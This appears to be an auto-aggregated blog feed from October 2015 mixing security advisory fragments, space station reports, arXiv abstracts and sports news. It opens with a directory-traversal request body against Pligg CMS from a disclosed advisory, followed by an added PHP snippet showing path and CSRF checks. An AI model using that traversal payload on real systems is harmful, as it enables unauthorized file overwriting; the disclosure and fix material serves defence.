    the_file2=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fvar%2Fwww%2Fhtml%2Fpligg-cms-master%2F404.php&updatedfile=&isempty=1&save=Save+Changes

4. Solution

This issue was not fixed by the vendor.

5. Report Timeline

09/01/2015 Informed Vendor about Issue (no reply)
09/22/2015 Reminded Vendor of disclosure date
09/22/2015 Vendor replied, issue has been sent to staff
09/29/2015 Reminded Vendor of disclosure date (no reply)
10/07/2015 Disclosed to public

Blog Reference: http://ift.tt/1ioJGpn

Source: Gmail -> IFTTT-> Blogger
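Both editor advisories above (directory traversal on open, and traversal plus missing extension check and missing CSRF protection on save) come down to three absent checks. The following is an added example, not Pligg code and not part of the advisories; it sketches those checks for a save handler, assuming a session array that holds the CSRF token, a form field named token, and hypothetical function names. The the_file2 and updatedfile field names are taken from the advisory's request.

```php
<?php
declare(strict_types=1);

/** Resolve a submitted file name to an existing .tpl file inside $templateDir,
 *  or return null. The check runs on the canonical path, after "../" and
 *  symlinks have been resolved, not on the submitted string. */
function resolve_template(string $templateDir, string $requested): ?string
{
    $base = realpath($templateDir);
    if ($base === false || strpos($requested, "\0") !== false) {
        return null;
    }
    if (strtolower(pathinfo($requested, PATHINFO_EXTENSION)) !== 'tpl') {
        return null;                            // extension allowlist
    }
    $real = realpath($base . DIRECTORY_SEPARATOR . $requested);
    if ($real === false || !is_file($real)) {
        return null;                            // only existing templates are editable
    }
    $prefix = $base . DIRECTORY_SEPARATOR;
    return strncmp($real, $prefix, strlen($prefix)) === 0 ? $real : null;
}

/** Create the per-session token once (to be embedded in the editor form). */
function csrf_token(array &$session): string
{
    if (empty($session['csrf'])) {
        $session['csrf'] = bin2hex(random_bytes(32));
    }
    return $session['csrf'];
}

/** Constant-time comparison of the submitted token with the session token. */
function csrf_valid(array $session, $submitted): bool
{
    return is_string($submitted) && !empty($session['csrf'])
        && hash_equals($session['csrf'], $submitted);
}

/** Save handler: token first, then path confinement, then the write. */
function handle_save(string $templateDir, array $session, array $post): string
{
    if (!csrf_valid($session, $post['token'] ?? null)) {
        return 'rejected: missing or wrong CSRF token';
    }
    $name = $post['the_file2'] ?? '';
    $body = $post['updatedfile'] ?? '';
    if (!is_string($name) || !is_string($body)) {
        return 'rejected: malformed request';
    }
    $path = resolve_template($templateDir, $name);
    if ($path === null) {
        return 'rejected: not an editable template';
    }
    file_put_contents($path, $body, LOCK_EX);
    return 'saved: ' . basename($path);
}

// Constructed demo tree in the system temp directory.
$root = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'editor_demo_' . bin2hex(random_bytes(4));
mkdir($root . '/templates', 0700, true);
file_put_contents($root . '/templates/header.tpl', '<h1>demo</h1>');
file_put_contents($root . '/settings.php', 'outside the template tree');

$session = [];
$token = csrf_token($session);

// Constructed requests: one legitimate save and three that must be refused.
$requests = [
    ['token' => $token, 'the_file2' => 'header.tpl',      'updatedfile' => '<h1>new</h1>'],
    ['token' => $token, 'the_file2' => '../settings.php', 'updatedfile' => 'x'],
    ['token' => $token, 'the_file2' => 'missing.tpl',     'updatedfile' => 'x'],
    [                   'the_file2' => 'header.tpl',      'updatedfile' => 'x'],
];
foreach ($requests as $post) {
    printf("%-18s %s\n", $post['the_file2'], handle_save($root . '/templates', $session, $post));
}

// Clean up the demo tree.
unlink($root . '/templates/header.tpl');
unlink($root . '/settings.php');
rmdir($root . '/templates');
rmdir($root);
```

The same resolve_template check applies to the read path (the the_file parameter in the directory traversal advisory) before the file is opened.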

[FD] KeeFarce - A KeePass 2.x database extraction tool

KeeFarce - An in-memory looter for KeePass 2.x databases

URL: http://ift.tt/1M4uzxk

Source: Gmail -> IFTTT-> Blogger

[FD] eBay Magento <= 1.9.2.1 XML eXternal Entity Injection (XXE) on PHP FPM

eBay Magento CE <= 1.9.2.1 XML eXternal Entity Injection (XXE) on PHP FPM
eBay Magento EE <= 1.14.2.1

Details at: http://ift.tt/1ioJFlf

Regards,
Dawid Golunski
http://legalhackers.com

Source: Gmail -> IFTTT-> Blogger

IC 1871: Inside the Soul Nebula


This cosmic close-up looks deep inside the Soul Nebula. The dark and brooding dust clouds outlined by bright ridges of glowing gas are cataloged as IC 1871. About 25 light-years across, the telescopic field of view spans only a small part of the much larger Heart and Soul nebulae. At an estimated distance of 6,500 light-years the star-forming complex lies within the Perseus spiral arm of the Milky Way, seen in planet Earth's skies toward the constellation Cassiopeia. An example of triggered star formation, the dense star-forming clouds of IC 1871 are themselves sculpted by the intense winds and radiation of the region's massive young stars. This color image adopts a palette made popular in Hubble images of star-forming regions. via NASA http://ift.tt/1kdERR7

Thursday, October 29, 2015

Anonymous plans to reveal names of KKK members

Anonymous has threatened to reveal the identities of 1,000 Ku Klux Klan members. It's hackers vs. haters — round two. The amorphous hacker group .

from Google Alert - anonymous http://ift.tt/1Nc9mm6
via IFTTT

Anonymous Plans to Identify 1000 KKK Members

The “hacktivist” collective Anonymous have vowed to release the names of “about 1000” Ku Klux Klan members as part of an ongoing operation ...

from Google Alert - anonymous http://ift.tt/1GzUWeg
via IFTTT

ISS Daily Summary Report – 10/29/15

Post Extravehicular Activity (EVA):  Due to the EVA yesterday, the US crew was scheduled for a half duty day.  This morning, Kelly and Lindgren completed post-EVA health assessments.  Kelly, Yui and Lindgren then participated in an EVA debrief session with ground specialists.  Later, Kelly remated wire harness W0142 to the Node 1 Starboard Gore Panel.  The wire harness was demated to provide an upstream physical inhibit for the EVA installation of W2289 during EVA #32.  Lastly, Lindgren completed a refill of the Extravehicular Mobility Unit (EMU) feed water tanks and an ullage dump on EMUs 3003 and 3010.   Plant Gravity Sensing 2 (PGS2) Investigation:  Yui retrieved a Seed Paper Kit from a Minus Eighty Degree Celsius Laboratory Freezer for ISS (MELFI), prepared the Seed Papers for 4 Culture Dishes and then returned the culture dishes to the MELFI.  Tomorrow the seeds will be inserted into the Cell Biology Experiment Facility (CBEF) to start the second of two runs for PGS2.  The PGS2 investigation supports the study of cellular formation of the plant’s gravity sensors and the molecular mechanism for gravity sensing in plants grown in microgravity conditions.   Plasma Kristall-4 (PK-4) Investigation:  Kononenko performed closeout activities for the first run of PK-4, completed today, and prepared the equipment for the next run.  He then replaced the data hard drives with new ones, and then filled the PK-4 Chamber first with cleaning gas and then with Neon gas.  PK-4 is a scientific payload for performing research in the field of ‘Complex Plasmas': low temperature gaseous mixtures composed of ionized gas, neutral gas and micron-sized particles. The micro-particles become highly charged in the plasma and interact strongly with each other which can lead to a self-organized structure of the micro-particles: so-called plasma crystals. 
Experiments in the facility aim to study Transport Properties, Thermodynamics, Kinetics and Statistical Physics and Non-linear waves and Instabilities in the plasmas.   eValuatIon And monitoring of microBiofiLms insidE the ISS (ViABLE) Experiment:  Kelly touched the palm of his hand to experimental materials located on the top covers of ViABLE bags.  He also blew on experimental materials located on those covers.  This activity is performed approximately every 45 days and the bags are photographed at 6 month intervals.  ViABLE involves the evaluation of microbial biofilm development on metallic and textile space materials located inside and on the cover of Nomex pouches. Microbial biofilms are known for causing damage and contamination on the Mir space station and the ISS.  The potential application of novel methodologies and products to treat space materials may lead to improvements in the environmental quality of confined human habitats in space and on earth.   Habitability:  Today, Kelly documented his recent observations related to human factors and habitability for the Habitability investigation.  Habitability assesses the relationship between crew members and their environment in order to better prepare for future long-duration spaceflights to destinations, such as near earth asteroids and Mars. Observations recorded during 6 month and 1 year missions can help spacecraft designers determine how much habitable volume is required, and whether a mission’s duration impacts how much space crew members need.   Sleep Log:  Kornienko recorded a Sleep Log entry today.  The Sleep ISS-12 experiment monitors ambient light exposure and crew member activity and collects subjective evaluations of sleep and alertness.  The investigation examines the effects of space flight and ambient light exposure on sleep during a year-long mission on the ISS.   Environmental Sampling:  Yui deployed a formaldehyde monitor in the US Lab. It will remain deployed for 2 days.  
He also collected air samples in the US Lab and Japanese Experiment Module (JEM) Pressurized Module (JPM) using Grab Sample Containers (GSCs).  These samples will be returned to the ground on 43S for post-flight analysis.     Today’s Planned Activities All activities were completed unless otherwise noted. Hematocrit Test Hematocrit  Hardware Stowage Repair of SM Interior Panel 322 by Installing Overlay Panels – Day 1 PLAZMENNIY KRISTALL. Hard Drive Exchange Counter Measure System (CMS) Harmful Contaminant Measurements in SM Periodic Health Status (PHS) Post EVA Evaluation Analysis of SM Atmosphere for Freon Using Freon Leak Analyzer/Detector (ФИТ) PILOT-T. Experiment Ops PGS2-ELT2 – Cable Reconfig Post-EVA crew health status – data transfer PGS2 – Sample Retrieval from MELFI VIZIR. Calibration of СКП-И Hardware PGS2 – Sample Insertion into MELFI PLAZMENNIY KRISTALL. Filling Chamber with Cleaning Gas Columbus video power up for HAM Radio session Pille Dosimeter Reading after USOS EVA WRS – Recycle Tank Fill from EDV HABIT – Experiment Ops US post-EVA Debrief Conference CONTUR-2. P/L Assembly Setup on panel 418 Treatment of SM structural elements and shell areas with Fungistat Re-mate wire harness W0142 WRS – Recycle Tank Fill from EDV Progress 429 (SM Aft) Transfers and IMS Ops CONTUR-2. Experiment Session HAM Radio session from Columbus FMK Deployment Ops CIR Rack – Equipment Setup Grab Sample Container (GSC) Sampling Operations Initiate Condensate Sampling VIABLE – Kit Inspection COSMOCARD. Closeout Ops HMS – Food Frequency Questionnaire On-orbit Hearing Assessment using EARQ EMU Water Refill Evening Work Prep Terminate Condensate Sampling СОЖ Maintenance) RWS Teardown Evening Work Prep IMS Delta File Prep CONTUR-2. De-installation of master arm with adapter from panel 418 PLAZMENNIY KRISTALL. Gas Exchange in the Chamber to Neon VELO Exercise, Day 1 INTERACTION-2. Experiment Ops Start EMU METOX Regeneration CONTENT. Experiment Ops PLAZMENNIY KRISTALL. 
Hardware De-Installation and Stowage Prepack Crew Discretionary Conference Preparation of Reports for Roscosmos Web Site and Social Media ECON-M. Observations and Photography   Completed Task List Items P/TV Battery Charger Swap Air Quality Monitor Reposition   Ground Activities All activities were completed unless otherwise noted. MT Translation from WS2 to WS4   Three-Day Look Ahead: Friday, 10/30:  EVA Preparation, JEMAL ExHAM install Saturday, 10/31:  Weekly Cleaning, Crew Off Duty Sunday, 11/01:  Crew Off Duty   QUICK ISS Status – Environmental Control Group:                               Component Status Elektron Off Vozdukh Manual [СКВ] 1 – SM Air Conditioner System (“SKV1”) On [СКВ] 2 – SM Air Conditioner System (“SKV2”) On Carbon Dioxide Removal Assembly (CDRA) Lab Off Carbon […]

from ISS On-Orbit Status Report http://ift.tt/1HfjsMB
via IFTTT

Automatic Synthesis of Geometry Problems for an Intelligent Tutoring System. (arXiv:1510.08525v1 [cs.AI])

This paper presents an intelligent tutoring system, GeoTutor, for Euclidean Geometry that is automatically able to synthesize proof problems and their respective solutions given a geometric figure together with a set of properties true of it. GeoTutor can provide personalized practice problems that address student deficiencies in the subject matter.



from cs.AI updates on arXiv.org http://ift.tt/1Rhd9xz
via IFTTT

Attention with Intention for a Neural Network Conversation Model. (arXiv:1510.08565v1 [cs.NE])

In a conversation or a dialogue process, attention and intention play intrinsic roles. This paper proposes a neural network based approach that models the attention and intention processes. It essentially consists of three recurrent networks. The encoder network is a word-level model representing source side sentences. The intention network is a recurrent network that models the dynamics of the intention process. The decoder network is a recurrent network that produces responses to the input from the source side. It is a language model that is dependent on the intention and has an attention mechanism to attend to particular source side words, when predicting a symbol in the response. The model is trained end-to-end without labeling data. Experiments show that this model generates natural responses to user inputs.



from cs.AI updates on arXiv.org http://ift.tt/1P8OEDE
via IFTTT

Transalg: a Tool for Translating Procedural Descriptions of Discrete Functions to SAT. (arXiv:1405.1544v2 [cs.AI] UPDATED)

In this paper we present the Transalg system, designed to produce SAT encodings for discrete functions, written as programs in a specific language. Translation of such programs to SAT is based on propositional encoding methods for formal computing models and on the concept of symbolic execution. We used the Transalg system to make SAT encodings for a number of cryptographic functions.



from cs.AI updates on arXiv.org http://ift.tt/1kOzcdi
via IFTTT

Towards a General Framework for Actual Causation Using CP-logic. (arXiv:1410.7063v3 [cs.AI] UPDATED)

Since Pearl's seminal work on providing a formal language for causality, the subject has garnered a lot of interest among philosophers and researchers in artificial intelligence alike. One of the most debated topics in this context regards the notion of actual causation, which concerns itself with specific - as opposed to general - causal claims. The search for a proper formal definition of actual causation has evolved into a controversial debate, that is pervaded with ambiguities and confusion. The goal of our research is twofold. First, we wish to provide a clear way to compare competing definitions. Second, we also want to improve upon these definitions so they can be applied to a more diverse range of instances, including non-deterministic ones. To achieve these goals we will provide a general, abstract definition of actual causation, formulated in the context of the expressive language of CP-logic (Causal Probabilistic logic). We will then show that three recent definitions by Ned Hall (originally formulated for structural models) and a definition of our own (formulated for CP-logic directly) can be viewed and directly compared as instantiations of this abstract definition, which allows them to deal with a broader range of examples.



from cs.AI updates on arXiv.org http://ift.tt/1wwAIcw
via IFTTT

Approximate Counting in SMT and Value Estimation for Probabilistic Programs. (arXiv:1411.0659v2 [cs.LO] UPDATED)

#SMT, or model counting for logical theories, is a well-known hard problem that generalizes such tasks as counting the number of satisfying assignments to a Boolean formula and computing the volume of a polytope. In the realm of satisfiability modulo theories (SMT) there is a growing need for model counting solvers, coming from several application domains (quantitative information flow, static analysis of probabilistic programs). In this paper, we show a reduction from an approximate version of #SMT to SMT.

We focus on the theories of integer arithmetic and linear real arithmetic. We propose model counting algorithms that provide approximate solutions with formal bounds on the approximation error. They run in polynomial time and make a polynomial number of queries to the SMT solver for the underlying theory, exploiting "for free" the sophisticated heuristics implemented within modern SMT solvers. We have implemented the algorithms and used them to solve the value problem for a model of loop-free probabilistic programs with nondeterminism.



from cs.AI updates on arXiv.org http://ift.tt/1uoiZGy
via IFTTT

FIFA candidate Sheikh Salman denies role in rights abuses

MANAMA, Bahrain (AP) FIFA presidential candidate Sheikh Salman bin Ibrahim Al Khalifa has issued his strongest denial yet against claims he aided human rights abuses after pro-democracy protests.

from FOX Sports Digital http://ift.tt/1GNGvDb
via IFTTT

FIFA candidate Sheikh Salman denies role in rights abuse

MANAMA, Bahrain (AP) FIFA presidential candidate Sheikh Salman bin Ibrahim Al Khalifa has issued his strongest denial yet against claims he aided human rights abuses after pro-democracy protests.

from FOX Sports Digital http://ift.tt/1P0JpY4
via IFTTT

Sampdoria held to 1-1 draw at home to Empoli in Serie A

GENOA, Italy (AP) Sampdoria was held to a 1-1 draw by Empoli in Serie A on Thursday but maintained its unbeaten home record.

from FOX Sports Digital http://ift.tt/1Obaesv
via IFTTT

Ocean City, MD's surf is Good

October 28, 2015 at 07:00PM, the surf is Good!

Ocean City, MD Summary


Surf: shoulder high to 1 ft overhead
Maximum: 1.836m (6.02ft)
Minimum: 1.224m (4.02ft)

Maryland-Delaware Summary


from Surfline http://ift.tt/1kVmigH
via IFTTT

Anonymous threatens to reveal names of 1000 KKK members

Hacker collective Anonymous has threatened to reveal the names of 1000 Ku Klux Klan members. The two have been at odds since the Ferguson ...

from Google Alert - anonymous http://ift.tt/1M0iZ2W
via IFTTT

Anonymous donor, firefighters help save haunted house

Anonymous donor, firefighters help save haunted house. Oct. 29, 2015 - 1:25 - Rush is on to get iconic haunted house ready in Washington.

from Google Alert - anonymous http://ift.tt/1PTuZct
via IFTTT

Paul Gascoigne fined by court after harassing ex-girlfriend

BOURNEMOUTH, England (AP) Former England player Paul Gascoigne was fined and issued with a restraining order on Thursday after he pleaded guilty to sending a series of abusive tweets, phone calls and messages to his ex-girlfriend.

from FOX Sports Digital http://ift.tt/1WlzUSs
via IFTTT

Liverpool poses next challenge for under-pressure Mourinho

LONDON (AP) If things get any worse, Jose Mourinho might not last much longer in the Chelsea dugout.

from FOX Sports Digital http://ift.tt/1XC85rr
via IFTTT

Anonymous George, Earl of Wessex

Tinkercad user Anonymous George, Earl of Wessex. I'm a programmer, geek, hacker, coder, hipster, actor, and pitcher. I build random stuff for no ...

from Google Alert - anonymous http://ift.tt/1jUzjLT
via IFTTT

Ravens Buzz: Starting secondary may be intact this week for first time since Oct. 11; Philip Rivers 329 yds/game vs. BAL (ESPN)

from ESPN http://ift.tt/17lH5T2
via IFTTT

I have a new follower on Twitter


ApfelSina
ApfelSina and Twitter is now one of my passions, alongside Instagram, Snapchat and Whatsapp
Frankfurt am Main, Hessen

Following: 614 - Followers: 32

October 29, 2015 at 12:03PM via Twitter http://twitter.com/ApfelSina18

Friends of Bob Ross! MEGA-MARATHON!


Friends of Bob Ross! MEGA-MARATHON! The popular Twitch-TV will broadcast every episode of The Joy of Painting, in an epic marathon starting today at 2PM PST on http://ift.tt/1WkFaFT. That’s 403 episodes of Bob Ross that will play over the course of 8.5 days. Happy Painting!




from The 'hotspot' for all things Bob Ross. http://ift.tt/1Rga0hF
via IFTTT

Ravens: Steve Smith's competitive arrogance is alive and well, so not everyone believes he's really retiring - Trotter (ESPN)

from ESPN http://ift.tt/17lH5T2
via IFTTT

Struggling Greece hires Skibbe as national team coach

ATHENS, Greece (AP) The Greek football association has hired Michael Skibbe of Germany as the new national team coach, the fourth man to take the position in little over a year following the country's disastrous European Championship qualifying campaign.

from FOX Sports Digital http://ift.tt/1GMcsMq
via IFTTT

Rooney laser incident during shootout investigated by FA

LONDON (AP) Manchester United captain Wayne Rooney appeared to have a laser directed at his face during Wednesday's League Cup loss to Middlesbrough and the incident will be investigated by the English Football Association.

from FOX Sports Digital http://ift.tt/1MWcRsk
via IFTTT

Javier Mascherano admits to unpaid taxes in Spain

MADRID (AP) Barcelona defender Javier Mascherano told a court on Thursday that he did not properly pay his taxes in Spain after moving from Liverpool.

from FOX Sports Digital http://ift.tt/1WjpR5K
via IFTTT

Bayern to Frankfurt, Dortmund to Bremen in Bundesliga

FRANKFURT, Germany (AP) Bayern Munich director Matthias Sammer found something to complain about despite the team's record-breaking season and its latest success.

from FOX Sports Digital http://ift.tt/1KHt6b2
via IFTTT

MIT Scientists: Now You Can See Through Walls with Wi-Fi

Forget about Superman's X-ray vision: you can now see through walls using only a Wi-Fi device. Scientists at MIT's Computer Science and Artificial Intelligence Lab (CSAIL) have developed a device that uses WiFi signals to effectively see through walls and other obstacles, and identify which persons are standing behind them. Dubbed RF Capture, the new system is an enhanced version of their


from The Hacker News http://ift.tt/1OZYvgJ
via IFTTT

PSG still needs a rival as it bids for 4th straight title

PARIS (AP) Paris Saint-Germain's quest for a fourth straight title is looking so comfortable that the talk is centering on how many domestic records it might break.

from FOX Sports Digital http://ift.tt/1XB8muX
via IFTTT

Paul Gascoigne pleads guilty to harassing ex-girlfriend

BOURNEMOUTH, England (AP) Former England player Paul Gascoigne has pleaded guilty to harassing his former girlfriend and assaulting a photographer.

from FOX Sports Digital http://ift.tt/1Gyt6iF
via IFTTT

[FD] CVE-2015-7723 - Privilege Escalation Via Symlink Attacks On POSIX Shared Memory With Insecure Permissions In AMD fglrx-driver

[FD] CVE-2015-7724 - Privilege Escalation Via Symlink Attacks On POSIX Shared Memory With Insecure Permissions In AMD fglrx-driver

Wednesday, October 28, 2015

ISS Daily Summary Report – 10/28/15

Extravehicular Activity (EVA) #32:  EVA Crew-1 (EV1) Kelly and EV2 Lindgren egressed the Airlock at 7:03am CDT for EVA #32.  The Phase Elapsed Time was 7 hours and 16 minutes.  Prior to egress, for a short period of time, EV2 bumped the position of the water valve on his suit.  The suit was cleared to proceed after verification that water was not sublimating and the suit operated nominally throughout the EVA.  There will be an additional water recharge and inspection completed on that suit prior to the next EVA.   The planned objectives for the EVA were as follows: Alpha Magnetic Spectrometer (AMS) Blanket and TTCS Wedge Install Main Bus Switching Unit (MBSU) Multi-Layered Insulation (MLI) Removal and Skirt Tie-Down Space Station Remote Manipulator System (SSRMS) Latching End Effector (LEE)-B Lube Pressurized Mating Adapter (PMA)-3 / International Docking Adapter (IDA)-3 Cable Route Node 3 (N3) Non-Propulsive Vent (NPV) Install   The crew fully completed the AMS and MBSU tasks.  They completed the high priority LEE Lube tasks for lubing the ball screws and linear bearing tracks.  The lower priority task of lubing the equalization brackets and rollers was not completed.  The crew completed the PMA-3 IDA-3 cable routing and the aft portion of the PMA-3 power cable routing.  The forward portion of the PMA-3 power cable routing and the N3 NPV install were deferred to a future EVA.  The deferred tasks are not an impact to current ISS operations.   Plasma Kristall-4 (PK-4) Operations:  Kononenko provided support for the PK-4 experiment started yesterday by exchanging data hard drives.  Plasma Kristall-4 is a complex European Space Agency (ESA) plasma laboratory installed in the Columbus European Physiology Module (EPM) rack and operated by Russian crewmembers.  PK-4 supports research in the field of Complex Plasmas: low temperature gaseous mixtures composed of ionized gas, neutral gas and micron-sized particles. 
The micro-particles become highly charged in the plasma and interact strongly with each other, which can lead to a self-organized structure of the micro-particles (i.e., “plasma crystals”).   Reaction Self Test:  Kelly will complete a session today for the Reaction Self Test investigation.  Reaction Self Test helps crewmembers objectively identify when their performance capability is degraded by various fatigue-related conditions that can occur as a result of ISS operations and time in space (e.g., acute and chronic sleep restriction, slam shifts, extravehicular activity (EVA), and residual sedation from sleep medications).   Sleep Log:  Kornienko recorded a Sleep Log entry today.  The Sleep ISS-12 experiment monitors ambient light exposure and crew member activity and collects subjective evaluations of sleep and alertness.  The investigation examines the effects of space flight and ambient light exposure on sleep during a year-long mission on the ISS.   Today’s Planned Activities All activities are on schedule unless otherwise noted. NEIROIMMUNITET. Saliva Test Closing USOS Window Shutters Photo/TV EVA Camera Test ISS  HAM RADIO Power Down EVA CUCU Deactivation EMU Preparation for US EVA SEISMOPROGNOZ. Downlink data from Control and Data Acquisition Module (МКСД) HDD (start) Restoring Makita Battery – Equipment setup, assemble charging setup Comm configuration for EVA PLAZMENNIY KRISTALL. Hard Drive Exchange MOTOCARD. Experiment EMU Prep for EVA Prebreathe in EMU Makita tool battery discharge COSMOCARD. Setup. Starting 24-hr ECG Recording Installation of Makita battery No.1 to charge Brine (urine) transfer from EDV-U to Progress 429 (SM Aft) Rodnik БВ1 tank Repair and Installation of Overlay Panels on SM panel 322 -Search for and Configure Equipment Crew Lock Depress Remove battery No.1 from charge,  Install Makita tool No.2 to charge Soyuz 717 Samsung tablet charge – start NEIROIMMUNITET. 
Closeout Ops Main Bus Switching Unit (MBSU) USOS EVA Tasks AMS blanket install Remove battery 2 from charge, Install Makita tool battery No.7 to charge CALCIUM. Experiment Session 11 Progress 429 (SM Aft) Transfers and IMS Ops SM Ventilation System Preventive Maintenance. Group В1 Relocating PBAs for upcoming EVA Main Bus Switching Unit (MBSU) USOS EVA Tasks USOS EVA PMA3 Cable Routing USOS EVA LEE (SSRMS) Lube SSRMS Motion for LEE Lube Remove battery No.7 from charge, Install Makita tool battery No.8 to charge СОЖ maintenance Soyuz 717 Samsung tablet charging – end USOS EVA PMA3 Cable Routing Tasks Life On The Station Photo and Video Terminate Makita Battery No.8 charge, Configuration Teardown, Battery and Equipment Stowage NPV Installation USOS EVA PMA3 Cable Routing Tasks IMS Delta File Prep INTERACTION-2. Experiment Crew Lock Ingress Closing USOS Window Shutters SEISMOPROGNOZ. Download data from Control and Data Acquisition Module (МКСД) HDD (end) and start backup EVA Glove Photo Setup Crew Lock Pre-Repress Crew Lock Repress USOS Post-EVA Cleanup Return to nominal comm configuration after USOS EVA Hematocrit.  Hardware Setup EVA Camera Reconfig EMU Glove photos downlink Reaction Self-Test (Sleep) [Scheduled just prior to crew sleep]   Completed Task List Items None   Ground Activities All activities are on schedule unless otherwise noted. 
System commanding in support of EVA   Three-Day Look Ahead: Thursday, 10/29:  1/2 Duty Day, Post EVA Activities, Plant Gravity Sensing 2, VIABLE Training Friday, 10/30:  EVA Preparation, JEMAL ExHAM install Saturday, 10/31:  Weekly Cleaning, Crew Off Duty   QUICK ISS Status – Environmental Control Group:                               Component Status Elektron Off Vozdukh Manual [СКВ] 1 – SM Air Conditioner System (“SKV1”) On [СКВ] 2 – SM Air Conditioner System (“SKV2”) Off Carbon Dioxide Removal Assembly (CDRA) Lab Off Carbon Dioxide Removal Assembly (CDRA) Node 3 Operate Major Constituent Analyzer (MCA) Lab Shutdown Major Constituent Analyzer (MCA) Node 3 Operate Oxygen Generation Assembly (OGA) Process Urine Processing Assembly (UPA) Standby Trace Contaminant Control System (TCCS) Lab Off Trace Contaminant Control System (TCCS) Node 3 Full Up  

from ISS On-Orbit Status Report http://ift.tt/1kcpDvC
via IFTTT

I have a new follower on Twitter


DJ KING ASSASSIN
Put Yo Mind To It https://t.co/emEfX8QnhF #2PAC #THUGLIFE #ICET #WYCLEF #KOKANE #EAZYE #LAYLAW #DEEYADA #COLD187 #KRAYZIEBONE #4TAY #SCC #ZAPP #FLTG #COREDJS
Live From Compton, CA
http://t.co/E1UniVHQCu
Following: 2697852 - Followers: 4335174

October 28, 2015 at 09:10PM via Twitter http://twitter.com/DjKingAssassin

Anonymous Threatens to Release Names of KKK Members

The hacker collective known as "Anonymous" is threatening to strip anonymity from the Ku Klux Klan.

from Google Alert - anonymous http://ift.tt/1HcHebY
via IFTTT

Suspended Platini insists he's still the best to lead FIFA

GENEVA (AP) Suspended by FIFA as the presidential election contest kicks off, Michel Platini insists he is still the best candidate to succeed Sepp Blatter.

from FOX Sports Digital http://ift.tt/20bifBu
via IFTTT

Computing the Ramsey Number R(4,3,3) using Abstraction and Symmetry breaking. (arXiv:1510.08266v1 [cs.AI])

The number $R(4,3,3)$ is often presented as the unknown Ramsey number with the best chances of being found "soon". Yet, its precise value has remained unknown for almost 50 years. This paper presents a methodology based on abstraction and symmetry breaking that applies to solve hard graph edge-coloring problems. The utility of this methodology is demonstrated by using it to compute the value $R(4,3,3)=30$. Along the way it is required to first compute the previously unknown set ${\cal R}(3,3,3;13)$ consisting of 78,892 Ramsey colorings.



from cs.AI updates on arXiv.org http://ift.tt/1NBZhNL
via IFTTT

Communication: Words and Conceptual Systems. (arXiv:1507.08073v12 [cs.AI] UPDATED)

Words (phrases or symbols) play a key role in human life. Word (phrase or symbol) representation is the fundamental problem for knowledge representation and understanding. A word (phrase or symbol) usually represents a name of a category. However, it is always a challenge that how to represent a category can make it easily understood. In this paper, a new representation for a category is discussed, which can be considered a generalization of classic set. In order to reduce representation complexity, the economy principle of category representation is proposed. The proposed category representation provides a powerful tool for analyzing conceptual systems, relations between words, communication, knowledge, situations. More specifically, the conceptual system, word relations and communication are mathematically defined and classified such as ideal conceptual system, perfect communication and so on; relation between words and sentences is also studied, which shows that knowledge are words. Furthermore, how conceptual systems and words depend on situations is presented.



from cs.AI updates on arXiv.org http://ift.tt/1KzLNTZ
via IFTTT

Man United stunned in League Cup by 2nd-tier Middlesbrough

LONDON (AP) Manchester United was eliminated from the League Cup by second-tier Middlesbrough in a penalty shootout on Wednesday in the latest fourth-round shock.

from FOX Sports Digital http://ift.tt/1WiqnRn
via IFTTT

Roma beats Udinese 3-1 to return to top of Serie A

MILAN (AP) Roma returned to the top of Serie A with a 3-1 win over Udinese on Wednesday, but there was more misery for Juventus as the four-time defending champion lost 1-0 at Sassuolo with defender Giorgio Chiellini sent off.

from FOX Sports Digital http://ift.tt/1P66nM4
via IFTTT

After 3 draws, Klopp finally wins as Liverpool manager

LONDON (AP) Juergen Klopp celebrated his first victory as Liverpool manager on Wednesday following three draws, with his new team reaching the League Cup quarterfinals by eliminating Bournemouth.

from FOX Sports Digital http://ift.tt/1PV5pTD
via IFTTT

Dortmund wins 7-1, Moenchengladbach beats Schalke 2-0

FRANKFURT, Germany (AP) Borussia Moenchengladbach beat Schalke for the second time in four days, winning 2-0 in the second round of the German Cup on Wednesday, while last season's runner-up Borussia Dortmund routed second-division Paderborn 7-1.

from FOX Sports Digital http://ift.tt/1LYOHO7
via IFTTT

Barcelona held to 0-0 draw in Copa del Rey

VILLANUEVA DE LA SERENA, Spain (AP) Barcelona was held to a scoreless draw by third-tier Villanovense on Wednesday in a disappointing start to the Copa del Rey for the defending champion.

from FOX Sports Digital http://ift.tt/1HcihNY
via IFTTT

Court moves forward with probe into Neymar's transfer

MADRID (AP) Spain's national court has rejected Neymar's request to throw out a probe into his transfer to Barcelona two years ago.

from FOX Sports Digital http://ift.tt/1XzlGjh
via IFTTT

Biggest Free Hosting Company Hacked; 13.5 Million Plaintext Passwords Leaked

The world’s most popular Free Web Hosting company 000Webhost has suffered a major data breach, exposing more than 13.5 Million of its customers' personal records online. The stolen data includes usernames, passwords in plain text, email addresses, IP addresses and last names of around 13.5 Million of 000Webhost's customers. According to a recent report published by Forbes, the Free


from The Hacker News http://ift.tt/1LCq1g8
via IFTTT

A guide to the FIFA presidential candidates

GENEVA (AP) The FIFA presidential election on Feb. 26 will be a 7-man race. For now, at least.

from FOX Sports Digital http://ift.tt/1kb7caz
via IFTTT

Visa threatens to end FIFA backing if reforms unsatisfactory

LONDON (AP) FIFA sponsor Visa has threatened to cut its ties with the scandal-tarnished governing body if the credit card company isn't satisfied with reforms.

from FOX Sports Digital http://ift.tt/1KFPth0
via IFTTT

Serie A struggler Bologna fires coach Delio Rossi

BOLOGNA, Italy (AP) Bologna has fired coach Delio Rossi, a day after a 1-0 loss at home to 10-man Inter Milan.

from FOX Sports Digital http://ift.tt/1P56589
via IFTTT

UNM Swimming and Diving Receives Anonymous Donation

ALBUQUERQUE, N.M. – The University of New Mexico swimming and diving program has received an anonymous donation of $20,000. The gift ...

from Google Alert - anonymous http://ift.tt/1PQQ8Ee
via IFTTT

Bremen's US striker Johannsson sidelined after surgery

BREMEN, Germany (AP) Werder Bremen says United States striker Aron Johannsson has undergone surgery on a hip problem and will be out for several weeks.

from FOX Sports Digital http://ift.tt/1OYwNkk
via IFTTT

Blatter chastises FIFA ethics committee for banning him

GENEVA (AP) Taking a dictatorial approach to his role as FIFA president, Sepp Blatter lashed out at the ethics committee for being ''against me'' and criticized his 90-day ban as being ''total nonsense.''

from FOX Sports Digital http://ift.tt/1NAC7Hn
via IFTTT

Mascherano suspended 2 games, will get to face Real Madrid

